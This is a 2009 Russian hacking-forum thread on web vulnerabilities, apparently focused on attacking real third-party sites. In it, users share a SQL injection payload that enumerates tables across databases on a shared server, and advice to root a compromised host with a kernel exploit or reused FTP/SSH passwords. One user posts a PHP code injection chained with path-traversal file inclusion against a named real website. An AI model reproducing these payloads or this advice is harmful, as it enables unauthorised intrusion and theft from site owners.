ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7851  
Старый 27.06.2009, 14:59
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

вот только у меня 54 БД получилось!!
Так и долдно, или я не туда залез??
 
Ответить с цитированием

  #7852  
Старый 27.06.2009, 15:12
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

Цитата:
Сообщение от GOGA075  
вот только у меня 54 БД получилось!!
Так и долдно, или я не туда залез??
туда, легко может быть и намного больше...
 
Ответить с цитированием

  #7853  
Старый 27.06.2009, 15:13
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

Это БД других сайтов рассположенных на данном сервере??
 
Ответить с цитированием

  #7854  
Старый 27.06.2009, 15:20
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

Цитата:
Сообщение от GOGA075  
Это БД других сайтов рассположенных на данном сервере??
скорее всего так, но могут быть и несколько БД на один сайт
 
Ответить с цитированием

  #7855  
Старый 27.06.2009, 16:19
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

а как правельно создать запрос на перебор тавлиц к другой БД??
 
Ответить с цитированием

  #7856  
Старый 27.06.2009, 16:37
Vish
Banned
Регистрация: 12.06.2009
Сообщений: 8
Провел на форуме:
26426

Репутация: 1
По умолчанию

имеется шелл на сайте, но права на все файлы стоят 644, ну вообще везде права граматно расставлены, возможно-ли обойти права и изменить содержимое файла на сервере?
 
Ответить с цитированием

  #7857  
Старый 27.06.2009, 16:38
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

дефейсы и их обсуждения на ачате запрещено.
 
Ответить с цитированием

  #7858  
Старый 27.06.2009, 16:39
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

Цитата:
Сообщение от GOGA075  
а как правельно создать запрос на перебор тавлиц к другой БД??
?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables+where+table_schema='имя базы'
 
Ответить с цитированием

  #7859  
Старый 27.06.2009, 17:06
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Цитата:
Сообщение от Vish  
имеется шелл на сайте, но права на все файлы стоят 644, ну вообще везде права граматно расставлены, возможно-ли обойти права и изменить содержимое файла на сервере?
смотри версию ядра, ищи под неё эксплоит и попробуй порутать, либо ищи пассы разные и пробуй их на ftp, ssh...
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #7860  
Старый 29.06.2009, 00:32
DeepXhadow
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695

Репутация: 19
По умолчанию

Несколько страниц был спор об этом инклуде...у меня вопрос остался

Делаю такой запрос:

Цитата:
http://www.cyl.ru/index.php?lang=ru&page=order2&fcountry=<? system($cmd); ?>
Потом читаю
Цитата:
http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../tmp/sess_adda%00
Выдает

Цитата:
cyl_price_rub|i:4880;cyl_price_dollar|i:148;order_ id|N;country|s:19:"<? system($cmd); ?>";countryname|s:6:"Россия";city|N;oplata|N;o plata_price|N;name|N;zip|N;cityname|N;address|N;me tro|N;phone|N;calltime|N;email|N;info|N;the_curren t_page|s:6:"order2";the_previous_page|s:6:"order2" ;the_partner|N;user_id|i:181944214;
Полему при LFI не исполнился php код? Что я сделал не так?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ